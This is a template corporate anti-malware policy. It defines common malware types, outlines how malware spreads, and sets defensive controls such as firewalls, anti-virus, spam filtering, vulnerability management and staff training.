Anti-Malware Policy

Anti-Malware Policy
Confidential

Anti-Malware Policy

Document Classification: Confidential

Version: 1
Dated: 02 March 2021
Document Author:
Document Owner:

Version 1 Page 2 of 10 02 March 2021

 Anti-Malware Policy
Confidential

Revision History

Versio Date Revision Summary of Changes

n Author

Distribution

Name Title

Approval

Name Position Signature Date

Version 1 Page 3 of 10 02 March 2021

 Anti-Malware Policy
Confidential

Contents

1 INTRODUCTION........................................................................................................................................8
2 THE MALWARE THREAT.......................................................................................................................9
2.1 DEFINITION.................................................................................................................................................9
2.2 TYPES OF MALWARE..................................................................................................................................9
2.3 HOW MALWARE SPREADS.........................................................................................................................9
2.3.1 Phishing..........................................................................................................................................10
2.3.2 Websites and Mobile Code.............................................................................................................10
2.3.3 Removable Media...........................................................................................................................10
2.3.4 Hacking..........................................................................................................................................10
3 ANTI-MALWARE POLICY.....................................................................................................................11
3.1 FIREWALL.................................................................................................................................................11
3.2 ANTI-VIRUS..............................................................................................................................................11
3.3 SPAM FILTERING......................................................................................................................................11
3.4 SOFTWARE INSTALLATION AND SCANNING.............................................................................................12
3.5 VULNERABILITY MANAGEMENT..............................................................................................................12
3.6 USER AWARENESS TRAINING...................................................................................................................12
3.7 THREAT MONITORING AND ALERTS........................................................................................................12
3.8 TECHNICAL REVIEWS...............................................................................................................................12
3.9 MALWARE INCIDENT MANAGEMENT.......................................................................................................13

Version 1 Page 4 of 10 02 March 2021

 Anti-Malware Policy
Confidential

1 Introduction

The threat posed by malware has never been more serious than it is today.
OrgName. systems and users are under a constant bombardment of attempts to
circumvent security in order to make some kind of gain or to disrupt the normal
operation of the organization.

This threat can come from a number of sources including:

 Organised gangs attempting to steal money or commit blackmail

 Competitor organizations trying to obtain confidential information
 Politically motivated groups
 Rogue employees within the organization
 Nation state sponsored “cyber-warfare” units
 Individuals exercising curiosity or testing their skills

Whatever the source, the result of a successful security breach is that the
organization and its stakeholders are affected, sometimes seriously, and harm is
caused.

One of the primary tools used by such attackers is malware and it is essential that
effective precautions are taken by ORGANIZATION. to protect itself against this
threat.

This document sets out the organization’s policy with regard to defence against
malware. Its intended audience is IT and information security management and
support staff who will implement and maintain the organization’s defences. Malware-
related information and advice for users is included in associated policy documents
referenced below.

This control applies to all systems, people and processes that constitute the
organization’s information systems, including board members, directors, employees,
suppliers and other third parties who have access to [Organization Name] systems.

The following policies and procedures are relevant to this document:

 Mobile Device Policy

 Teleworking Policy
 Acceptable Use Policy
 Information Security Incident Response Procedure

Version 1 Page 5 of 10 02 March 2021

 Anti-Malware Policy
Confidential

2 The Malware Threat

2.1 Definition

There is no single definition of the term “Malware” in use but for the purposes of this
policy the following definition is used:

“Malware is any code or software that may be harmful or destructive to the

information processing capabilities of the organization”

The term is derived from the phrase “Malicious Software” and may also be called
malicious code or commonly (but inaccurately) “a virus”.

2.2 Types of Malware

Malware comes in many forms and is constantly changing as previous attack routes
are closed and new ones are found. The most common types of malware found
today are:

 Virus – a program that performs an unwanted function on the infected

computer. This could involve destructive actions or the collection of
information that can be used by the attacker
 Trojan – a program that pretends to be legitimate code but conceals other
unwanted functions. Often disguised as a game or useful utility program
 Worm – a program that is capable of copying itself onto other computers or
devices without user interaction
 Logic bomb – malicious code that has been set to run at a specified date and
time or when certain conditions are met
 Rootkit – a program used to disguise malicious activities on a computer by
hiding the processes and files from the user
 Keylogger – code that records keystrokes entered by the user
 Backdoor – a program that allows unauthorised access at will to an attacker

Often these types of malware will be used in combination with each other. For
example, an attacker will encourage an unwitting user to infect a computer with a
virus which will allow unauthorised access. This initial access will then be used to
install a rootkit to disguise further activities, a keylogger to capture keystrokes and a
backdoor to allow future access without detection.

2.3 How Malware Spreads

In order for malicious software to carry out its intended purpose it needs to be
installed on the target device or computer. There are a number of key ways in which
malware infects computers and networks, although new ways are being created all
the time.

Version 1 Page 6 of 10 02 March 2021

 Anti-Malware Policy
Confidential

The most common infection techniques are as follows.

2.3.1 Phishing

This method involves tricking the user into taking some action that causes a
malicious program to run and infect the computer being used. It is usually achieved
via the blanket sending of unsolicited emails (Spam) with file attachments or web
links included in them. When the user opens the file or clicks on the link the
malicious action is triggered.

Phishing attacks have become more sophisticated in recent years and can be very
believable and enticing to the user. More targeted versions of phishing have
appeared such as Spear Phishing (aimed at a particular organization) and even
Whaling (aimed at an individual).

2.3.2 Websites and Mobile Code

The widespread use of mobile code such as JavaScript on websites has provided
attackers with another route to infect computers with malware. Often websites will be
created to host the malware which is activated either upon clicking on a link or in
some cases simply by visiting the website.

Increasingly, legitimate websites are being compromised and made to host malware
without the owner’s knowledge, making this type of attack very difficult for the user to
avoid.

2.3.3 Removable Media

USB memory sticks, CDs, DVDs and other removable media devices provide an
effective way of spreading malware onto additional computers. When the media is
inserted into the machine the malware will either run and infect the target or will copy
itself onto the removable media in order to prepare to infect the next machine it is
plugged into.

2.3.4 Hacking

Or “Cracking” as it is more accurately known, is a more targeted and therefore less

common method of introducing malware onto a computer or network by gaining
unauthorised access to the network from outside (and sometimes inside) the
organization. This method requires more knowledge on the part of the perpetrator
and often exploits existing vulnerabilities in the software or network devices being
used. Once access has been gained, malware will be installed remotely onto the
compromised machine.

Version 1 Page 7 of 10 02 March 2021

 Anti-Malware Policy
Confidential

3 Anti-Malware Policy

In order to prevent the infection of ORGANIZATION. computers and networks and

avoid the potentially dire consequences of such infection, there are a number of key
controls that will be adopted as policy.

The key concept adopted in this policy is “defence in depth” and no single control
should be relied upon to provide adequate protection. This is therefore not a choice
between controls but a list of necessary controls, all of which should be implemented
where possible to guard against the threats outlined in the previous section.

3.1 Firewall

A firewall will be installed at all points at which the internal network is connected to
the Internet.

Where possible, individual firewalls will be enabled on client computers. Access

permissions must be set such that the user cannot disable the firewall.

3.2 Anti-Virus

A commercial, supported anti-virus platform ‘Symantec’ will be installed within the

organization at key locations:

 Firewall
 Email servers
 Proxy servers
 All other servers
 All user computers
 Mobile devices, including laptops (phones and tablets where possible)

All anti-virus clients will be set to obtain signature updates on a regular basis, either
directly from the vendor website or from a central server within the organization.

By default, on access scanning must be enabled to provide real time protection.

Regular full scans must also be carried out at least weekly.

Users must not be able to disable the protection which is configured centrally.

3.3 Spam Filtering

A system will be installed to filter out unsolicited and potentially harmful emails
(spam). Types of attachments known to often contain malware must be blocked or
removed before delivery to the user.

Version 1 Page 8 of 10 02 March 2021

 Anti-Malware Policy
Confidential

3.4 Software Installation and Scanning

Users must not have sufficient administrative access to their computer to allow them
to install software onto it. Only approved software will be allowed and this must be
installed by the IT department upon authorised request.

Regular scanning of user computers to detect unauthorised software must be carried

out.

3.5 Vulnerability Management

Information on software vulnerabilities will be collected from vendors and third-party

sources and updates applied where available. If possible and if permitted by the
organizational change management policy, updates will be applied automatically as
soon as they are released.

Vulnerability scanning must be carried out regularly, particularly on business-critical

servers and networks.

For new vulnerabilities identified by ORGANIZATION. employees, a coordinated

disclosure policy will apply.

3.6 User Awareness Training

Users must be made aware when starting with the organization of the information
security policy and be trained in ways to avoid falling victim to attacks such as
phishing.

This awareness training must be repeated on a regular basis to all employees who
make use of IT equipment.

3.7 Threat Monitoring and Alerts

Information about emerging threats will be obtained from appropriate sources and
users alerted proactively of potential attacks, giving as much detail as possible to
maximise the chance of recognition.

3.8 Technical Reviews

Regular reviews will be carried out of business-critical servers and networks to

identify any malware that has been installed since the last review. This will include
the taking of a snapshot of the configuration for later comparison purposes.

Version 1 Page 9 of 10 02 March 2021

 Anti-Malware Policy
Confidential

3.9 Malware Incident Management

In the event that malware is detected on a server, client, network or other IT

component, an information security incident will be raised. This will be managed in
accordance with the procedures set out in the Information Security Incident
Response Procedure.

Version 1 Page 10 of 10 02 March 2021